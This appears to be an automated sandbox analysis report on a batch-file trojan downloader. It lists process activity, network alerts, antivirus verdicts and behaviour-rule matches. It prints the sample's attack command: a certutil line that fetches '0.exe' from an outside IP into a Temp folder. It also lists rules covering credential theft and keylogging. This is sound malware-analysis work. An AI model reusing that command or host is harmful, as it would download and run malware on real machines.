Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | July 22, 2024, 1:32 p.m. | July 22, 2024, 1:34 p.m. |
-
cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "dnhucXQYQdjMQ" C:\Users\test22\AppData\Local\Temp\clean.bat
940-
-
certutil.exe certutil -urlcache -split -f http://108.174.58.28/0.exe C:\Windows\Temp\0.exe
2232
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
108.174.58.28 | Active | Moloch |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49167 -> 108.174.58.28:80 | 2018581 | ET MALWARE Single char EXE direct download likely trojan (multiple families) | A Network Trojan was detected |
TCP 192.168.56.103:49166 -> 108.174.58.28:80 | 2018581 | ET MALWARE Single char EXE direct download likely trojan (multiple families) | A Network Trojan was detected |
TCP 192.168.56.103:49167 -> 108.174.58.28:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
TCP 192.168.56.103:49166 -> 108.174.58.28:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
Suricata TLS
No Suricata TLS
suspicious_features | Connection to IP address | suspicious_request | GET http://108.174.58.28/0.exe |
request | GET http://108.174.58.28/0.exe |
file | C:\Windows\Temp\0.exe |
ESET-NOD32 | BAT/TrojanDownloader.Agent.PBO |
Kingsoft | Win32.Troj.Undef.a |
Microsoft | Trojan:Script/Wacatac.B!ml |
description | Create a windows service | rule | Create_Service | ||||||
description | Communications over RAW Socket | rule | Network_TCP_Socket | ||||||
description | Communication using DGA | rule | Network_DGA | ||||||
description | Match Windows Http API call | rule | Str_Win32_Http_API | ||||||
description | Take ScreenShot | rule | ScreenShot | ||||||
description | Escalate priviledges | rule | Escalate_priviledges | ||||||
description | Steal credential | rule | local_credential_Steal | ||||||
description | PWS Memory | rule | Generic_PWS_Memory_Zero | ||||||
description | Record Audio | rule | Sniff_Audio | ||||||
description | Communications over HTTP | rule | Network_HTTP | ||||||
description | Communications use DNS | rule | Network_DNS | ||||||
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerCheck__RemoteAPI | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__ConsoleCtrl | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | (no description) | rule | Check_Dlls | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | Affect hook table | rule | win_hook | ||||||
description | File Downloader | rule | Network_Downloader | ||||||
description | Match Windows Inet API call | rule | Str_Win32_Internet_API | ||||||
description | Communications over FTP | rule | Network_FTP | ||||||
description | Run a KeyLogger | rule | KeyLogger | ||||||
description | Communications over P2P network | rule | Network_P2P_Win |
host | 108.174.58.28 |
file | C:\Windows\Temp\0.exe |
file | C:\Windows\Temp\0.exe |